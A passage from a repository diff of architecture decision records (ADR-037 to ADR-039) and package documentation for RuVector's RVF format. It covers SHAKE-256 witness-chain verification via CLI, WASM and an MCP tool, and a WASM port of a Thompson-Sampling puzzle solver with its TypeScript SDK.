- **JSON manifest**: Human-readable scorecard, ablation assertions, full witness chain with hex hashes. Suitable for review, CI comparison, and documentation.
- **`.rvf` binary**: A valid RVF file containing:
- `WITNESS_SEG` (0x0A): Native 73-byte entries created by `rvf_crypto::create_witness_chain()`, verifiable by `rvf_crypto::verify_witness_chain()`.
- `META_SEG` (0x07): JSON-encoded scorecards, assertions, and config metadata.
### 3. WASM witness verification
Two new exports added to `rvf-wasm`:
| Export | Signature | Description |
|--------|-----------|-------------|
| `rvf_witness_verify` | `(chain_ptr, chain_len) -> i32` | Verify SHAKE-256 chain integrity. Returns entry count or negative error. |
| `rvf_witness_count` | `(chain_len) -> i32` | Count entries without full verification. |
This enables browser-side verification of acceptance test `.rvf` files without any backend.
### 4. Feature-gated ed25519 in rvf-crypto
To add `rvf-crypto` as a dependency to the no_std WASM microkernel without pulling in the heavy `ed25519-dalek` crate, the `sign` module is now gated behind an `ed25519` feature flag:
```toml
[features]
default = ["std", "ed25519"]
ed25519 = ["dep:ed25519-dalek"]
```
The hash, witness, attestation, lineage, and footer modules remain available without `ed25519`. Existing callers that use default features are unaffected.
### 5. Three-mode ablation grading
The acceptance test runs all three ablation modes and asserts six properties:
| Assertion | Criterion |
|-----------|-----------|
| B beats A on cost | >= 15% cost reduction |
| C beats B on robustness | >= 10% noise accuracy gain |
| Compiler safe | < 5% false-hit rate |
| A skip nonzero | Fixed policy uses skip modes |
| C multi-mode | Learned policy uses >= 2 skip modes |
| C penalty < B penalty | Learned policy reduces early-commit penalty |
All assertions, per-mode scorecards, and the witness chain root hash are included in the publishable artifact.
## Verification Protocol
An external developer reproduces the test:
```bash
# 1. Generate with default config (Rust)
cargo run --bin acceptance-rvf -- generate -o manifest.json
# 2. Compare chain root hash
# If chain_root_hash matches, outcomes are bit-for-bit identical
# 3. Verify the .rvf binary witness chain
cargo run --bin acceptance-rvf -- verify-rvf -i acceptance_manifest.rvf
# 4. Or verify in-browser via WASM:
# const count = rvf_witness_verify(chainPtr, chainLen);
```
An npm-based verification path is also available via `@ruvector/rvf-solver`:
```typescript
import { RvfSolver } from '@ruvector/rvf-solver';
// Run the same acceptance test from JavaScript/TypeScript
const solver = await RvfSolver.create();
const manifest = solver.acceptance({
holdoutSize: 100,
trainingPerCycle: 100,
cycles: 5,
stepBudget: 400,
seed: 42n,
});
// manifest.allPassed === true means Mode C (learned policy) passed
// manifest.witnessEntries gives the chain entry count
// solver.witnessChain() returns the raw SHAKE-256 bytes for verification
solver.destroy();
```
## Consequences
### Positive
- External developers can independently verify benchmark outcomes offline
- The `.rvf` binary is compatible with all RVF tooling (CLI, WASM, Node.js)
- Browser-side verification via `rvf_witness_verify` requires zero backend
- Deterministic replay means same config always produces same root hash
- The SHAKE-256 chain is forward-compatible with RVF's attestation infrastructure
### Negative
- Switching from SHA-256 to SHAKE-256 changes existing chain root hashes (version bumped to 2)
- The `ed25519` feature gate adds a minor complexity to rvf-crypto's feature matrix
- The WASM binary size increases slightly with the sha3 dependency
### Neutral
- JSON and .rvf outputs are independent — either can be used alone
- The `rvf_witness_count` export is a convenience that avoids full verification cost

View File

@@ -0,0 +1,205 @@
# ADR-038: npx ruvector & rvlite Witness Verification Integration
| Field | Value |
|-------|-------|
| **Status** | Proposed |
| **Date** | 2026-02-16 |
| **Deciders** | RuVector core team |
| **Supersedes** | -- |
| **Related** | ADR-029 (RVF canonical format), ADR-032 (RVF WASM integration), ADR-037 (Publishable RVF acceptance test) |
## Context
ADR-037 introduced the publishable RVF acceptance test, which produces two artifacts:
1. **JSON manifest** -- human-readable scorecards, ablation assertions, and SHAKE-256 witness chain
2. **`.rvf` binary** -- native WITNESS_SEG (0x0A) + META_SEG (0x07), verifiable by `rvf_crypto::verify_witness_chain()`
ADR-032 added `rvf_witness_verify` and `rvf_witness_count` exports to `rvf-wasm`, enabling browser-side verification.
However, neither the `npx ruvector` CLI nor the `rvlite` browser runtime currently exposes witness chain verification to end users. The Rust `rvf-cli` has `rvf verify-witness` (17 subcommands), but the Node.js wrapper in `npm/packages/ruvector/bin/cli.js` does not surface it. Similarly, `rvlite` lists `@ruvector/rvf-wasm` as an optional peer dependency but does not call the witness verification exports.
This means an external developer who receives a `.rvf` acceptance test artifact currently needs the Rust toolchain to verify it. The goal is zero-friction verification via `npx` or a browser import.
## Decision
### 1. `npx ruvector rvf verify-witness <file.rvf>`
Add a `rvf verify-witness` subcommand to the ruvector Node.js CLI (`npm/packages/ruvector/bin/cli.js`):
```
npx ruvector rvf verify-witness acceptance_manifest.rvf
```
**Implementation path** (ordered by preference):
| Backend | Mechanism | Latency | Availability |
|---------|-----------|---------|--------------|
| Native N-API | `@ruvector/rvf-node` binding to `rvf_crypto::verify_witness_chain()` | <1ms | When native binary is installed |
| WASM | `@ruvector/rvf-wasm` `rvf_witness_verify()` export | ~5ms | Always (WASM is universal) |
The CLI auto-detects the best available backend (same pattern as the existing `VectorDB` platform detection). It loads the `.rvf` file, locates the first WITNESS_SEG, extracts the payload, and calls the verification function.
**Output format:**
```
Verifying witness chain: acceptance_manifest.rvf
Segment type: WITNESS_SEG (0x0A)
Entry count: 147 entries (73 bytes each)
Chain status: INTACT -- all hashes verified (SHAKE-256)
VERIFICATION: PASSED
```
**Error cases:**
```
Chain status: BROKEN at entry 42 -- prev_hash mismatch
VERIFICATION: FAILED (exit code 1)
```
### 2. `npx ruvector rvf inspect <file.rvf>`
Extend the existing `rvf inspect` to parse and display acceptance test metadata from the META_SEG:
```
npx ruvector rvf inspect acceptance_manifest.rvf
Segments:
[0] WITNESS_SEG 0x0A 10,731 bytes (147 entries)
[1] META_SEG 0x07 2,048 bytes (JSON metadata)
Acceptance Test Metadata:
Format: rvf-acceptance-test v2
Chain root hash: 7a3f...b2c1
All passed: true
Scorecards: 3 modes (A/B/C)
```
### 3. `rvlite` browser SDK -- `verifyWitnessChain()`
Add a `verifyWitnessChain()` function to the rvlite SDK (`npm/packages/rvlite/src/index.ts`):
```typescript
import { verifyWitnessChain } from 'rvlite';
// Load .rvf file (e.g., from fetch or File API)
const rvfBytes = await fetch('acceptance_manifest.rvf').then(r => r.arrayBuffer());
const result = verifyWitnessChain(new Uint8Array(rvfBytes));
console.log(result.valid); // true
console.log(result.entryCount); // 147
console.log(result.error); // null or error description
```
**Implementation:**
```typescript
export interface WitnessVerifyResult {
valid: boolean;
entryCount: number;
error: string | null;
}
export function verifyWitnessChain(rvfBytes: Uint8Array): WitnessVerifyResult {
// 1. Parse segment header to find WITNESS_SEG
// 2. Extract payload bytes
// 3. Allocate WASM memory, copy payload
// 4. Call rvf_witness_verify(ptr, len)
// 5. Interpret result (positive = count, negative = error code)
// 6. Free WASM memory
}
```
This function:
- Requires `@ruvector/rvf-wasm` (already an optional peer dep in rvlite)
- Throws a clear error if the WASM module is not available
- Handles WASM memory allocation/deallocation internally
- Returns a typed result object, not a raw integer
### 4. `rvlite` CLI -- `rvlite verify-witness <file.rvf>`
Register a `verify-witness` command in `cli-rvf.ts` alongside the existing `rvf-migrate` and `rvf-rebuild` commands:
```bash
npx rvlite verify-witness acceptance_manifest.rvf
```
This uses the same WASM backend as the SDK function above.
### 5. MCP tool -- `rvf_verify_witness`
Add to the ruvector MCP server (`npm/packages/ruvector/bin/mcp-server.js`) so Claude Code can verify acceptance test artifacts directly:
```json
{
"name": "rvf_verify_witness",
"description": "Verify SHAKE-256 witness chain in an .rvf file",
"input_schema": {
"type": "object",
"properties": {
"path": { "type": "string", "description": "Path to .rvf file" }
},
"required": ["path"]
}
}
```
## Integration Surface
```
┌────────────────────────┐
│ acceptance-rvf (Rust) │
│ generate + verify │
└──────────┬─────────────┘
│ produces
┌──────────▼─────────────┐
│ acceptance_manifest.rvf │
│ WITNESS_SEG + META_SEG │
└──────────┬─────────────┘
┌────────────────┼────────────────┐
│ │ │
┌─────────▼──────┐ ┌──────▼───────┐ ┌──────▼──────────┐
│ npx ruvector │ │ npx rvlite │ │ Browser (rvlite │
│ rvf │ │ verify- │ │ SDK) │
│ verify-witness │ │ witness │ │ verifyWitness │
└────────┬───────┘ └──────┬───────┘ │ Chain() │
│ │ └──────┬──────────┘
┌────────▼────────────────▼─────────────────▼──────────┐
│ @ruvector/rvf-wasm │
│ rvf_witness_verify(chain_ptr, chain_len) -> i32 │
│ rvf_witness_count(chain_len) -> i32 │
└──────────────────────────────────────────────────────┘
```
## Implementation Order
| Phase | Work | Package | Complexity |
|-------|------|---------|------------|
| **1** | `verifyWitnessChain()` SDK function | `rvlite` | Low -- WASM call + segment parsing |
| **2** | `verify-witness` CLI command | `rvlite` | Low -- wraps SDK function |
| **3** | `rvf verify-witness` CLI subcommand | `ruvector` | Medium -- N-API fallback + WASM detection |
| **4** | `rvf inspect` metadata display | `ruvector` | Low -- parse META_SEG JSON |
| **5** | `rvf_verify_witness` MCP tool | `ruvector` | Low -- wraps CLI logic |
Each phase is independently shippable. Phase 1+2 enable browser verification. Phase 3-5 enable CLI and agent verification.
## Consequences
### Positive
- External developers verify `.rvf` acceptance tests with `npx ruvector rvf verify-witness` -- zero Rust toolchain required
- Browser-based verification via `rvlite` SDK requires only `npm install rvlite @ruvector/rvf-wasm`
- Claude Code agents can verify witness chains via MCP tool without file manipulation
- Consistent verification path: Rust CLI, Node.js CLI, browser SDK, and WASM microkernel all use the same `rvf_witness_verify` implementation
- Auto-detection prefers native N-API when available for sub-millisecond verification
### Negative
- WASM module adds ~46 KB to rvlite when `@ruvector/rvf-wasm` is installed
- Segment header parsing must be duplicated in TypeScript (WASM only verifies the chain payload, not the segment framing)
- N-API binding for `verify_witness_chain` does not exist yet in `rvf-node` -- Phase 3 requires adding it
### Neutral
- The JSON manifest verification (`verify --input manifest.json`) remains available via the Rust binary for users who prefer JSON over binary `.rvf`
- `@ruvector/rvf-wasm` remains an optional peer dependency -- rvlite works without it but witness verification is unavailable

View File

@@ -0,0 +1,515 @@
# ADR-039: RVF Solver WASM — Self-Learning AGI Engine Integration
| Field | Value |
|-------|-------|
| **Status** | Implemented |
| **Date** | 2026-02-16 (updated 2026-02-17) |
| **Deciders** | RuVector core team |
| **Supersedes** | -- |
| **Related** | ADR-032 (RVF WASM integration), ADR-037 (Publishable RVF acceptance test), ADR-038 (npx/rvlite witness verification) |
## Context
ADR-037 established the publishable RVF acceptance test with a SHAKE-256 witness chain, and ADR-038 planned npm integration for **verifying** those artifacts. However, neither the existing `rvf-wasm` microkernel nor the npm packages expose the actual self-learning engine that produces the AGI benchmarks.
The core AGI capabilities live exclusively in the Rust benchmarks crate (`examples/benchmarks/src/`):
- **PolicyKernel**: Thompson Sampling two-signal model (safety Beta + cost EMA)
- **KnowledgeCompiler**: Signature-based pattern cache with compiled skip-mode configs
- **AdaptiveSolver**: Three-loop architecture (fast: solve, medium: policy, slow: compiler)
- **ReasoningBank**: Trajectory tracking with checkpoint/rollback and non-regression gating
- **Acceptance test**: Multi-cycle training/holdout evaluation with three ablation modes
These components have no FFI dependencies, no filesystem access during solve, and no system clock requirements — making them ideal candidates for WASM compilation.
## Decision
### Create `rvf-solver-wasm` as a standalone no_std WASM module
A new crate at `crates/rvf/rvf-solver-wasm/` compiles the complete self-learning solver to `wasm32-unknown-unknown`. It is a `no_std + alloc` crate (same architecture as `rvf-wasm`) with a C ABI export surface.
**Key design choices:**
| Choice | Rationale |
|--------|-----------|
| **no_std + alloc** | Matches rvf-wasm pattern, runs in any WASM runtime (browser, Node.js, edge) |
| **Self-contained types** | Pure-integer `Date` type replaces `chrono` dependency; `BTreeMap` replaces `HashMap` |
| **libm for float math** | `sqrt`, `log`, `cos`, `pow` via `libm` crate (pure Rust, no_std compatible) |
| **xorshift64 RNG** | Deterministic, no `rand` crate dependency, identical to benchmarks RNG |
| **C ABI exports** | Maximum compatibility — works with any WASM host (no wasm-bindgen required) |
| **Handle-based API** | Up to 8 concurrent solver instances, same pattern as `rvf_store_*` exports |
### WASM Export Surface
```
┌─────────────────────────────────────────────────────┐
│ rvf-solver-wasm exports │
├─────────────────────────────────────────────────────┤
│ Memory: │
│ rvf_solver_alloc(size) -> ptr │
│ rvf_solver_free(ptr, size) │
│ │
│ Lifecycle: │
│ rvf_solver_create() -> handle │
│ rvf_solver_destroy(handle) │
│ │
│ Training (three-loop learning): │
│ rvf_solver_train(handle, count, │
│ min_diff, max_diff, seed_lo, seed_hi) -> i32 │
│ │
│ Acceptance test (full ablation): │
│ rvf_solver_acceptance(handle, holdout, │
│ training, cycles, budget, │
│ seed_lo, seed_hi) -> i32 │
│ │
│ Result / Policy / Witness reads: │
│ rvf_solver_result_len(handle) -> i32 │
│ rvf_solver_result_read(handle, out_ptr) -> i32 │
│ rvf_solver_policy_len(handle) -> i32 │
│ rvf_solver_policy_read(handle, out_ptr) -> i32 │
│ rvf_solver_witness_len(handle) -> i32 │
│ rvf_solver_witness_read(handle, out_ptr) -> i32 │
└─────────────────────────────────────────────────────┘
```
### Architecture Preserved in WASM
The WASM module preserves all five AGI capabilities:
1. **Thompson Sampling two-signal model** — Beta posterior for safety (correct & no early-commit) + EMA for cost. Gamma sampling via Marsaglia's method using `libm`.
2. **18 context buckets** — 3 range (small/medium/large) x 3 distractor (clean/some/heavy) x 2 noise = 18 buckets. Each bucket maintains per-arm stats for `None`, `Weekday`, `Hybrid` skip modes.
3. **Speculative dual-path** — When top-2 arms are within delta 0.15 and variance > 0.02, the solver speculatively executes the secondary arm. This is preserved identically in WASM.
4. **KnowledgeCompiler** — Constraint signature cache (`v1:{difficulty}:{sorted_constraint_types}`). Compiles successful trajectories into optimized configs with compiled skip-mode, step budget, and confidence scores.
5. **Three-loop solver** — Fast (constraint propagation + solve), Medium (PolicyKernel selection), Slow (ReasoningBank → KnowledgeCompiler). Checkpoint/rollback on accuracy regression.
### Integration with RVF Ecosystem
```
┌──────────────────────┐ ┌──────────────────────┐
│ rvf-solver-wasm │ │ rvf-wasm │
│ (self-learning │ ──────▶ │ (verification) │
│ AGI engine) │ witness │ │
│ │ chain │ rvf_witness_verify │
│ rvf_solver_train │ │ rvf_witness_count │
│ rvf_solver_acceptance│ │ │
│ rvf_solver_witness_* │ │ rvf_store_* │
└──────────┬───────────┘ └──────────────────────┘
│ uses
┌──────▼──────┐
│ rvf-crypto │
│ SHAKE-256 │
│ witness │
│ chain │
└─────────────┘
```
The solver produces a SHAKE-256 witness chain (via `rvf_crypto::create_witness_chain`) for every acceptance test run. This chain is in the native 73-byte-per-entry format, directly verifiable by `rvf_witness_verify` in the rvf-wasm microkernel.
### npm Integration Path
#### High-Level SDK (`@ruvector/rvf-solver`)
The `@ruvector/rvf-solver` npm package provides a typed TypeScript wrapper around the raw WASM C-ABI exports, with automatic WASM loading, memory management, and JSON deserialization.
```typescript
import { RvfSolver } from '@ruvector/rvf-solver';
// Create solver (lazy-loads WASM on first call)
const solver = await RvfSolver.create();
// Train on 1000 puzzles (three-loop learning)
const result = solver.train({ count: 1000, minDifficulty: 1, maxDifficulty: 10, seed: 42n });
console.log(`Accuracy: ${(result.accuracy * 100).toFixed(1)}%`);
// Run full acceptance test (A/B/C ablation)
const manifest = solver.acceptance({ holdoutSize: 100, trainingPerCycle: 100, cycles: 5, seed: 42n });
console.log(`Mode C passed: ${manifest.allPassed}`);
// Inspect policy state (Thompson Sampling parameters, context buckets)
const policy = solver.policy();
console.log(`Context buckets: ${Object.keys(policy?.contextStats ?? {}).length}`);
// Get tamper-evident witness chain (73 bytes per entry, SHAKE-256)
const chain = solver.witnessChain();
console.log(`Witness chain: ${chain?.length ?? 0} bytes`);
solver.destroy();
```
The SDK also re-exports through the unified `@ruvector/rvf` package:
```typescript
// Unified import — solver + database in one package
import { RvfDatabase, RvfSolver } from '@ruvector/rvf';
```
#### npm Package Structure
```
npm/packages/rvf-solver/
├── package.json # @ruvector/rvf-solver, CJS/ESM dual exports
├── tsconfig.json # ES2020 target, strict mode, declarations
├── pkg/
│ ├── rvf_solver.js # WASM loader (singleton, Node CJS/ESM + browser)
│ ├── rvf_solver.d.ts # Low-level WASM C-ABI type declarations
│ └── rvf_solver_bg.wasm # Built from rvf-solver-wasm crate
└── src/
├── index.ts # Barrel exports: RvfSolver + all types
├── solver.ts # RvfSolver class (create/train/acceptance/policy/witnessChain/destroy)
└── types.ts # TrainOptions, AcceptanceManifest, PolicyState, etc.
```
| Type | Fields | Purpose |
|------|--------|---------|
| `TrainOptions` | `count`, `minDifficulty?`, `maxDifficulty?`, `seed?` | Configure training run |
| `TrainResult` | `trained`, `correct`, `accuracy`, `patternsLearned` | Training outcome |
| `AcceptanceOptions` | `holdoutSize?`, `trainingPerCycle?`, `cycles?`, `stepBudget?`, `seed?` | Configure acceptance test |
| `AcceptanceManifest` | `modeA`, `modeB`, `modeC`, `allPassed`, `witnessEntries`, `witnessChainBytes` | Full ablation results |
| `PolicyState` | `contextStats`, `earlyCommitPenalties`, `prepass`, `speculativeAttempts` | Thompson Sampling state |
| `SkipModeStats` | `attempts`, `successes`, `alphaSafety`, `betaSafety`, `costEma` | Per-arm bandit stats |
#### Low-Level WASM Usage (advanced)
```javascript
// Direct WASM C-ABI usage (without the SDK wrapper)
const wasm = await WebAssembly.instantiate(solverModule);
const handle = wasm.exports.rvf_solver_create();
const correct = wasm.exports.rvf_solver_train(handle, 1000, 1, 10, 42, 0);
const len = wasm.exports.rvf_solver_result_len(handle);
const ptr = wasm.exports.rvf_solver_alloc(len);
wasm.exports.rvf_solver_result_read(handle, ptr);
const json = new TextDecoder().decode(new Uint8Array(wasm.memory.buffer, ptr, len));
// Witness chain verifiable by rvf-wasm
const wLen = wasm.exports.rvf_solver_witness_len(handle);
const wPtr = wasm.exports.rvf_solver_alloc(wLen);
wasm.exports.rvf_solver_witness_read(handle, wPtr);
const chain = new Uint8Array(wasm.memory.buffer, wPtr, wLen);
const verified = rvfWasm.exports.rvf_witness_verify(chainPtr, wLen);
wasm.exports.rvf_solver_destroy(handle);
```
## Module Structure
```
crates/rvf/rvf-solver-wasm/
├── Cargo.toml # no_std + alloc, dlmalloc, libm, serde_json
├── src/
│ ├── lib.rs # WASM exports, instance registry, panic handler
│ ├── alloc_setup.rs # dlmalloc global allocator, rvf_solver_alloc/free
│ ├── types.rs # Date arithmetic, Constraint, Puzzle, Rng64
│ ├── policy.rs # PolicyKernel, Thompson Sampling, KnowledgeCompiler
│ └── engine.rs # AdaptiveSolver, ReasoningBank, PuzzleGenerator, acceptance test
```
| File | Lines | Purpose |
|------|-------|---------|
| `types.rs` | 239 | Pure-integer date math (Howard Hinnant algorithm), constraints, puzzle type |
| `policy.rs` | ~480 | Full Thompson Sampling with Marsaglia gamma sampling, 18-bucket context |
| `engine.rs` | ~490 | Three-loop solver, acceptance test runner, puzzle generator |
| `lib.rs` | ~280 | 12 WASM exports, handle registry (8 slots), witness chain integration |
## Binary Size
| Build | Size |
|-------|------|
| Release (wasm32-unknown-unknown) | ~171 KB |
| After wasm-opt -Oz | 132 KB |
## npm Package Ecosystem
The AGI solver is exposed through a layered npm package architecture:
| Package | Version | Role | Install |
|---------|---------|------|---------|
| `@ruvector/rvf-solver` | 0.1.3 | Typed TypeScript SDK for the self-learning solver | `npm i @ruvector/rvf-solver` |
| `@ruvector/rvf` | 0.1.9 | Unified SDK re-exporting solver + database | `npm i @ruvector/rvf` |
| `@ruvector/rvf-node` | 0.1.7 | Native NAPI bindings with AGI methods (`indexStats`, `verifyWitness`, `freeze`, `metric`) | `npm i @ruvector/rvf-node` |
| `@ruvector/rvf-wasm` | 0.1.6 | WASM microkernel with witness verification | `npm i @ruvector/rvf-wasm` |
### Dependency Graph
```
@ruvector/rvf (unified SDK)
├── @ruvector/rvf-node (required, native NAPI)
├── @ruvector/rvf-wasm (optional, browser fallback)
└── @ruvector/rvf-solver (optional, AGI solver)
└── rvf-solver-wasm WASM binary (loaded at runtime)
```
### AGI NAPI Methods (rvf-node)
The native NAPI bindings expose AGI-relevant methods beyond basic vector CRUD:
| Method | Returns | Purpose |
|--------|---------|---------|
| `indexStats()` | `RvfIndexStats` | HNSW index statistics (layers, M, ef_construction, indexed count) |
| `verifyWitness()` | `RvfWitnessResult` | Verify tamper-evident SHAKE-256 witness chain integrity |
| `freeze()` | `void` | Snapshot-freeze current state for deterministic replay |
| `metric()` | `string` | Get distance metric name (`l2`, `cosine`, `dotproduct`) |
## Consequences
### Positive
- The actual self-learning AGI engine runs in the browser, Node.js, and edge runtimes via WASM
- No Rust toolchain required for end users — `npm install` + WASM load is sufficient
- Deterministic: same seed → same puzzles → same learning → same witness chain
- Witness chains produced in WASM are verifiable by the existing `rvf_witness_verify` export
- PolicyKernel state is inspectable via `rvf_solver_policy_read` (JSON serializable)
- Handle-based API supports up to 8 concurrent solver instances
- 132 KB binary (after wasm-opt -Oz) includes the complete solver, Thompson Sampling, and serde_json
- TypeScript SDK (`@ruvector/rvf-solver`) provides ergonomic async API with automatic WASM memory management
- Unified SDK (`@ruvector/rvf`) re-exports solver alongside database for single-import usage
- Native NAPI bindings expose AGI methods (index stats, witness verification, freeze) for server-side usage
### Negative
- Date arithmetic is reimplemented (pure-integer) rather than using `chrono`, requiring validation against the original
- `HashMap``BTreeMap` changes iteration order (sorted vs hash-order), which may produce different witness chain hashes than the native benchmarks
- Float math via `libm` may have minor precision differences vs std `f64` methods, affecting Thompson Sampling distributions
- The puzzle generator is simplified compared to the full benchmarks generator (no cross-cultural constraints)
### Neutral
- The native benchmarks crate remains the reference implementation for full-fidelity acceptance tests
- The WASM module is a faithful port, not a binding — both implementations should converge on the same acceptance test outcomes given identical seeds
- `rvf-solver-wasm` is a member of the `crates/rvf` workspace alongside `rvf-wasm`
### Implementation Notes (2026-02-17)
- WASM loader (`pkg/rvf_solver.js`) rewritten as pure CJS to fix ESM/CJS interop — `import.meta.url` and `export default` removed
- Snake_case → camelCase field mapping added in `solver.ts` for `train()`, `policy()`, and `acceptance()` methods
- `AcceptanceModeResult` type updated to match actual WASM output: `passed`, `accuracyMaintained`, `costImproved`, `robustnessImproved`, `zeroViolations`, `dimensionsImproved`, `cycles[]`
- SDK tests added at `npm/packages/rvf-solver/test/solver.test.mjs` (import validation, type structure, WASM integration)
- Security review completed: WASM loader path validation flagged as LOW risk (library-internal API), `JSON.parse` on WASM memory is trusted
---
## Appendix: Public Package Documentation
# @ruvector/rvf-solver
[![npm](https://img.shields.io/npm/v/@ruvector/rvf-solver)](https://www.npmjs.com/package/@ruvector/rvf-solver)
[![license](https://img.shields.io/npm/l/@ruvector/rvf-solver)](https://github.com/ruvnet/ruvector/blob/main/LICENSE)
![platforms](https://img.shields.io/badge/platforms-Node.js%20%7C%20Browser%20%7C%20Edge-blue)
Self-learning temporal solver with Thompson Sampling, PolicyKernel, ReasoningBank, and SHAKE-256 tamper-evident witness chains. Runs in the browser, Node.js, and edge runtimes via WebAssembly.
### Install
```bash
npm install @ruvector/rvf-solver
```
Or via the unified SDK:
```bash
npm install @ruvector/rvf
```
### Features
- **Thompson Sampling two-signal model** — safety Beta distribution + cost EMA for adaptive policy selection
- **18 context-bucketed bandits** — 3 range x 3 distractor x 2 noise levels for fine-grained context awareness
- **KnowledgeCompiler with signature-based pattern cache** — distills learned patterns into reusable compiled configurations
- **Speculative dual-path execution** — runs two candidate arms in parallel, picks the winner
- **Three-loop adaptive solver** — fast: constraint propagation solve, medium: PolicyKernel skip-mode selection, slow: KnowledgeCompiler pattern distillation
- **SHAKE-256 tamper-evident witness chain** — 73 bytes per entry, cryptographically linked proof of all operations
- **Full acceptance test with A/B/C ablation modes** — validates learned policy outperforms fixed and compiler baselines
- **~132 KB WASM binary, `no_std`** — runs anywhere WebAssembly does (browsers, Node.js, Deno, Cloudflare Workers, edge runtimes)
### Quick Start
```typescript
import { RvfSolver } from '@ruvector/rvf-solver';
// Create a solver instance (loads WASM on first call)
const solver = await RvfSolver.create();
// Train on 100 puzzles (difficulty 1-5)
const result = solver.train({ count: 100, minDifficulty: 1, maxDifficulty: 5 });
console.log(`Accuracy: ${(result.accuracy * 100).toFixed(1)}%`);
console.log(`Patterns learned: ${result.patternsLearned}`);
// Run full acceptance test (A/B/C ablation)
const manifest = solver.acceptance({ cycles: 3 });
console.log(`All passed: ${manifest.allPassed}`);
// Inspect Thompson Sampling policy state
const policy = solver.policy();
console.log(`Context buckets: ${Object.keys(policy?.contextStats ?? {}).length}`);
console.log(`Speculative attempts: ${policy?.speculativeAttempts}`);
// Get raw SHAKE-256 witness chain
const chain = solver.witnessChain();
console.log(`Witness chain: ${chain?.length ?? 0} bytes`);
// Free WASM resources
solver.destroy();
```
### API Reference
#### `RvfSolver.create(): Promise<RvfSolver>`
Creates a new solver instance. Initializes the WASM module on the first call; subsequent calls reuse the loaded module. Up to 8 concurrent instances are supported.
#### `solver.train(options: TrainOptions): TrainResult`
Trains the solver on randomly generated puzzles using the three-loop architecture. The fast loop applies constraint propagation, the medium loop selects skip modes via Thompson Sampling, and the slow loop distills patterns into the KnowledgeCompiler cache.
#### `solver.acceptance(options?: AcceptanceOptions): AcceptanceManifest`
Runs the full acceptance test with training/holdout cycles across all three ablation modes (A, B, C). Returns a manifest with per-cycle metrics, pass/fail status, and witness chain metadata.
#### `solver.policy(): PolicyState | null`
Returns the current Thompson Sampling policy state including per-context-bucket arm statistics, KnowledgeCompiler cache stats, and speculative execution counters. Returns `null` if no training has been performed.
#### `solver.witnessChain(): Uint8Array | null`
Returns the raw SHAKE-256 witness chain bytes. Each entry is 73 bytes and provides tamper-evident proof of all training and acceptance operations. Returns `null` if the chain is empty. The returned `Uint8Array` is a copy safe to use after `destroy()`.
#### `solver.destroy(): void`
Frees the WASM solver instance and releases all associated memory. The instance must not be used after calling `destroy()`.
### Types
#### TrainOptions
| Field | Type | Default | Description |
|-------|------|---------|-------------|
| `count` | `number` | required | Number of puzzles to generate and solve |
| `minDifficulty` | `number` | `1` | Minimum puzzle difficulty (1-10) |
| `maxDifficulty` | `number` | `10` | Maximum puzzle difficulty (1-10) |
| `seed` | `bigint \| number` | random | RNG seed for reproducible runs |
#### TrainResult
| Field | Type | Description |
|-------|------|-------------|
| `trained` | `number` | Number of puzzles trained on |
| `correct` | `number` | Number solved correctly |
| `accuracy` | `number` | Accuracy ratio (correct / trained) |
| `patternsLearned` | `number` | Patterns distilled by the ReasoningBank |
#### AcceptanceOptions
| Field | Type | Default | Description |
|-------|------|---------|-------------|
| `holdoutSize` | `number` | `50` | Number of holdout puzzles per cycle |
| `trainingPerCycle` | `number` | `200` | Number of training puzzles per cycle |
| `cycles` | `number` | `5` | Number of train/test cycles |
| `stepBudget` | `number` | `500` | Maximum constraint propagation steps per puzzle |
| `seed` | `bigint \| number` | random | RNG seed for reproducible runs |
#### AcceptanceManifest
| Field | Type | Description |
|-------|------|-------------|
| `version` | `number` | Manifest schema version |
| `modeA` | `AcceptanceModeResult` | Mode A results (fixed heuristic) |
| `modeB` | `AcceptanceModeResult` | Mode B results (compiler-suggested) |
| `modeC` | `AcceptanceModeResult` | Mode C results (learned policy) |
| `allPassed` | `boolean` | `true` if Mode C passed |
| `witnessEntries` | `number` | Number of entries in the witness chain |
| `witnessChainBytes` | `number` | Total witness chain size in bytes |
#### AcceptanceModeResult
| Field | Type | Description |
|-------|------|-------------|
| `passed` | `boolean` | Whether this mode met the accuracy threshold |
| `accuracyMaintained` | `boolean` | Accuracy maintained across cycles |
| `costImproved` | `boolean` | Cost per solve improved |
| `robustnessImproved` | `boolean` | Noise robustness improved |
| `zeroViolations` | `boolean` | No constraint violations |
| `dimensionsImproved` | `number` | Number of dimensions that improved |
| `cycles` | `CycleMetrics[]` | Per-cycle accuracy and cost metrics |
#### PolicyState
| Field | Type | Description |
|-------|------|-------------|
| `contextStats` | `Record<string, Record<string, SkipModeStats>>` | Per-context-bucket, per-arm Thompson Sampling statistics |
| `earlyCommitPenalties` | `number` | Total early-commit penalty cost |
| `earlyCommitsTotal` | `number` | Total early-commit attempts |
| `earlyCommitsWrong` | `number` | Early commits that were incorrect |
| `prepass` | `string` | Current prepass strategy identifier |
| `speculativeAttempts` | `number` | Number of speculative dual-path executions |
| `speculativeArm2Wins` | `number` | Times the second speculative arm won |
### Acceptance Test Modes
The acceptance test validates the solver's learning capability through three ablation modes run across multiple train/test cycles:
**Mode A (Fixed)** -- Uses a fixed heuristic skip-mode policy. This establishes the baseline performance without any learning. The policy does not adapt regardless of puzzle characteristics.
**Mode B (Compiler)** -- Uses the KnowledgeCompiler's signature-based pattern cache to select skip modes. The compiler distills observed patterns into compiled configurations but does not perform online Thompson Sampling updates.
**Mode C (Learned)** -- Uses the full Thompson Sampling two-signal model with context-bucketed bandits. This is the complete system: the fast loop solves, the medium loop selects arms based on safety Beta and cost EMA, and the slow loop feeds patterns back to the compiler. Mode C should outperform both A and B, demonstrating genuine self-improvement.
The test passes when Mode C achieves the accuracy threshold on holdout puzzles. The witness chain records every training and evaluation operation for tamper-evident auditability.
### Architecture
The solver uses a three-loop adaptive architecture:
```
+-----------------------------------------------+
| Slow Loop: KnowledgeCompiler |
| - Signature-based pattern cache |
| - Distills observations into compiled configs |
+-----------------------------------------------+
| ^
v |
+-----------------------------------------------+
| Medium Loop: PolicyKernel |
| - Thompson Sampling (safety Beta + cost EMA) |
| - 18 context buckets (range x distractor x noise) |
| - Speculative dual-path execution |
+-----------------------------------------------+
| ^
v |
+-----------------------------------------------+
| Fast Loop: Constraint Propagation Solver |
| - Generates and solves puzzles |
| - Reports outcomes back to PolicyKernel |
+-----------------------------------------------+
|
v
+-----------------------------------------------+
| SHAKE-256 Witness Chain (73 bytes/entry) |
| - Tamper-evident proof of all operations |
+-----------------------------------------------+
```
### Unified SDK
When using the `@ruvector/rvf` unified SDK, the solver is available as a sub-module:
```typescript
import { RvfSolver } from '@ruvector/rvf';
